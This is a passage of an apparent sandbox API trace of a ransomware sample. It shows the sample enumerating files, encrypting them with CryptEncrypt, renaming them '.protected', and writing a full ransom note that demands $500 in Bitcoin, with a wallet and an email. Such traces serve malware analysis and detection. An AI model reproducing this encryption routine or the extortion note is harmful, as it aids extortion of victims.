pdwDataLen=0x295e794*=0x30) returned 1 [0093.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.674] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 75 [0093.674] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0093.674] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 75 [0093.674] StrStrW (lpFirst="fwlink[1]", lpSrch=".rar") returned 0x0 [0093.674] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 75 [0093.674] StrStrW (lpFirst="fwlink[1]", lpSrch=".zip") returned 0x0 [0093.674] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0093.674] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.674] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0093.674] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.675] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.675] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.675] CloseHandle (hObject=0x150) returned 1 [0093.675] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].protected") returned 85 [0093.675] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1].protected")) returned 1 [0093.676] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.676] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.676] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\RESTORE_FILES.txt") returned 83 [0093.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.810] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.810] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0093.811] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.811] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0093.811] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.811] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0093.811] CloseHandle (hObject=0x14c) returned 1 [0093.812] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.812] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0093.812] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0093.812] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0093.812] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0093.812] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0093.812] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 68 [0093.812] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0093.812] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0093.812] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.812] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.812] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 68 [0093.812] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0093.812] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 68 [0093.812] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0093.812] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 68 [0093.812] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0093.812] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x43, lpOverlapped=0x0) returned 1 [0093.816] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.816] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x43, lpOverlapped=0x0) returned 1 [0093.816] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.816] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.816] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.816] CloseHandle (hObject=0x14c) returned 1 [0093.816] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini.protected") returned 78 [0093.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\desktop.ini.protected")) returned 1 [0093.817] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.817] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0093.817] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0093.817] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0093.817] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0093.817] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0093.817] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 66 [0093.817] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0093.817] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0093.817] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.818] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.818] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 66 [0093.818] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0093.818] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 66 [0093.818] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0093.818] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 66 [0093.819] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0093.819] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.833] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.833] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.833] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.833] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.834] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.834] CloseHandle (hObject=0x14c) returned 1 [0093.834] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.protected") returned 76 [0093.834] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat.protected")) returned 1 [0093.834] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.835] lstrcmpiW (lpString1="KQMHSVKD", lpString2="Windows") returned -1 [0093.835] lstrcmpiW (lpString1="KQMHSVKD", lpString2="Program Files") returned -1 [0093.835] lstrcmpiW (lpString1="KQMHSVKD", lpString2="Program Files (x86)") returned -1 [0093.835] lstrcmpiW (lpString1="KQMHSVKD", lpString2="$Recycle.bin") returned 1 [0093.835] lstrcmpiW (lpString1="KQMHSVKD", lpString2="System Volume Information") returned -1 [0093.835] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD") returned 65 [0093.835] lstrcmpW (lpString1="KQMHSVKD", lpString2=".") returned 1 [0093.835] lstrcmpW (lpString1="KQMHSVKD", lpString2="..") returned 1 [0093.835] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\*") returned 67 [0093.835] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.835] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.835] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.835] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.835] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.835] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.835] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\.") returned 67 [0093.835] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.835] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.835] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.835] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.835] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.835] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.835] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.835] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.836] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.836] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.836] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.836] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\..") returned 68 [0093.836] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.836] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.836] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.836] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.836] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.836] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.836] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.836] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0093.836] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0093.836] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0093.836] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0093.836] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0093.836] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 77 [0093.836] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0093.836] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0093.836] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.836] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.837] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 77 [0093.837] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0093.837] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 77 [0093.837] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0093.837] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 77 [0093.837] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0093.837] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0093.838] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.838] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0093.839] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.839] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.839] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.839] CloseHandle (hObject=0x150) returned 1 [0093.839] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.protected") returned 87 [0093.839] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini.protected")) returned 1 [0093.840] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.840] lstrcmpiW (lpString1="fwlink[1]", lpString2="Windows") returned -1 [0093.840] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files") returned -1 [0093.840] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files (x86)") returned -1 [0093.840] lstrcmpiW (lpString1="fwlink[1]", lpString2="$Recycle.bin") returned 1 [0093.840] lstrcmpiW (lpString1="fwlink[1]", lpString2="System Volume Information") returned -1 [0093.840] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 75 [0093.840] StrStrIW (lpFirst="fwlink[1]", lpSrch=".protected") returned 0x0 [0093.840] lstrcmpW (lpString1="fwlink[1]", lpString2="RESTORE_FILES.txt") returned -1 [0093.840] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.840] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 